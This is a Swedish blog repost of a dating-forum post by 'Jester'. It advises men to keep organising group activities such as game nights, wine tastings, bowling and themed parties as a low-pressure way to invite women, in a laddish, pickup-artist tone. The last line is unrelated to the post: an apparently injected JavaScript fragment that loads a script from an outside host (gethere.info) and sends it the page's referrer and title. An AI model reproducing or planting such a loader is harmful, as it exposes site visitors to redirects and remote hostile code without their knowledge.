Ett riktigt bra inlägg av forum-medlemmen Jester. Delta i diskussionen i forumtråden här.

Verkar vara många som undrar hur man ska få till träffar med tjejer man är intresserad av utan att verka needy. Jag funderade lite på hur jag själv gör och kom på att svaret är rätt enkelt: Jag har alltid nåt på gång. Det kan vara vad som helst men det är alltid nånting. En tjej som försöker få till en dejt med mig på tu man hand får slåss mot ett skapligt fullt schema, finna sig i att vänta en vecka eller två eller ses sent på kvällen (underförstått: Glory times!). Eller så kan dom hänga med på nåt jag gör.
Det absolut bästa sättet att träffa mycket folk, att få bonuspoäng på alfa-fronten och dessutom vara en jävligt kul och intressant människa är helt enkelt att hitta på saker hela tiden. Det behöver inte vara avancerade eller dyra grejer som friklättring i himalaya eller en skidresa till alperna. Faktum är att det är bättre om man gör mindre vardagsgrejer som i princip alla kan hänga med på.

Det som är så enormt kraftfullt med ”being that guy” är att du ses som initiativrik, social och den som många vill vara med så man inte missar nåt. Effekten stannar dessutom inte hos dom du umgås med under själva händelsen, utan alla dom pratar med om det efteråt. Jag får inte sällan höra att folk hört talas om mig när jag träffar yttre cirklarna av bekantskaps-kretsen som jag inte stött på innan. ”Jamen var det inte du som ordnade pilbågsskytte?”. Det sprider sig som ringar på vattnet, och det är sjukt ball att se hur det ibland bereder väg för nästan bisarrt enkla erövringar.

Det finns dock ett par regler som gör skillnaden mellan ”öppen kul kille hittar på nåt ball” och ”needy snubbe vill träffa mig, suck!”
* Låt henne ta med kompisar om hon vill. Ibland får man begränsa för man inte har plats för så många, men det går nästan alltid klämma in åtminstone en person till.
* Blanda folk från lite olika grupper. Om 10 pers känner varandra och det kommer in en färsking blir det ofta svårt för den personen att ta sig in i gruppen. Kan undvikas om hon är socialt kompetent som fan eller alla dina polare är måna om att alla ska trivas och alltid på gott humör (svårt, så blanda är bättre och oftast roligare).
* Hitta inte på specialregler för nån. Passar det inte och dom inte kan lösa det själva behöver dom inte komma. Bättre att dom hänger med nästa vecka eller anstränger sig lite än att dom trasslar till ditt umgänge med dina polare.
* Försök se till så alla trivs. Många är blyga. Presentera dom för varandra och dra igång lite snack och diskussioner. Blandar man folk från olika gäng har man oftast att göra i en timme eller så för att reda ut vem som känner vem och hur, och sen är snacket igång.

Tips på skitsaker att göra
Sällskapsspel. Köp nåt som kan bli lite lagom pinsamt och verkar kul. Om du inte vet vart du kan köpa sällskapsspel eller vet vilket du ska köpa; Fråga 10 random pers på gatan. Om nån av dom verkar trevlig och kul, bjud in dom också på spelkvällen.
Vinprovning (förfest-grej). Be alla ta med en flaska av sitt favvo-vin och prova dom ett efter ett när ni sitter och snackar. Ha vattenglas till hands så folk kan skölja munnen mellan varje vin. Går lika bra att göra med öl också. En galopp per person brukar va lagom (en flaska = två vinglas, en burk = 3).
Grillsöndag. Ta med engångsgrillar, varmkorv och korvbrön ut i skogen i första bästa fritids-område och bränn igång. Görs med fördel en halvsolig dag på hösten/vintern.
Streetbasket. Bollen kostar max 300 bagis på stadium. Leta reda på en skolgård med en eller två korgar och kör bara.
Matlagning. Bra mat att laga som är opretentiös och enkel är sallader, scones, hamburgare, pannkakor, etc, etc. Få folk att vara med och hjälpa till när det ska fixas och se till så alla köper med sig nåt av det som behövs så du inte betalar hela kalaset själv.
Bowling. Glöm inte boka bana så alla får spela.
Biljard. Boka bord så alla får spela.
Gocart. Kul men lite högre ribba på det. Oftast bra tidigare på dagen följt av förfest.
Dart. Gå till nån lokal pub och kasta lite pil och drick öl. Kolla upp reglerna för killer, bullben och klockan online så du har lite koll på spela att köra när ni väl är där.
Filmkväll. Dra ihop lite folk och kolla bara. Kan med fördel kombineras med matlagning om man vill göra lite mer happening av det.
Biokväll. Bio-dejt är bara chodeigt om det är day2 och ni bara är två som går. Styr upp ett större gäng så är du genast sociala kungen och hon är tacksam och glad att få hänga med istället. VIP-salongen på bergakungen i göteborg är sjukt najs att dra ihop ett gäng till som folk dessutom ofta pratar om efteråt, och särskilt om dom inte varit där innan.
Tema-fest. Alla älskar att spöka ut sig då och då. Hor&hallick, pink&black, white&silver, moulin rouge, 70-tal, 80-tal, woodstock, ”suit up!” eller filmkaraktärer är bra teman som alltid går hem.
Restaurang. Samlas nånstans och käka ute. Vet du inga mysiga och bra restauranger nära dig kan du fråga randoms på stan. Ät inte spaghetti när du väl är där wink Be that guy.
Bygg en lådbil. Sjukt underskattat och löjligt kul. Särskilt om man ölar lite samtidigt. Görs enklast när man fått tag på ett par schyssta hjul med vettiga axlar till redan, för det kan fan va en utmaning.
Lokala nöjesfältet/äventyrsbadet/turistfällan. Liseberg ska man gå till iaf en gång per sommar, men sjukt många gör aldrig det om inte nån annan tar tag i det. Be that guy och ta tag i det.

Ordna kvällar hos andra är också ett jävligt bra sätt att dra till med fest. Personen som arrangerar kommer känna sig positivt pushad av dig och tycka det är kul. Dessutom blir det mer kompis-känsla om man turas om istället för att det alltid är hos en och samma. I slutändan kommer du vara en kille som blir inbjuden till allsköns festliga prylar utan att du egentligen behöver anstränga dig. För varje social kväll eller fest du arrangerar blir du nämligen inbjuden till 5-10 liknande grejer själv. What goes around comes around, liksom.

Det här det absolut enklaste sättet att ragga upp en tjej du träffar i vardagen. Du har en perfekt anledning att bjuda in henne till grejer som är kul, har låg commitment och där det faktiskt inte gör nåt om hon inte följer med. Ni kommer ju ha kul utan henne också, så det blir her loss mer än din. Du förmedlar otroligt många bra kvaliteter utan att anstränga dig särskilt mycket och får dessutom ett roligare liv och gladare vänner.

/Jester

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;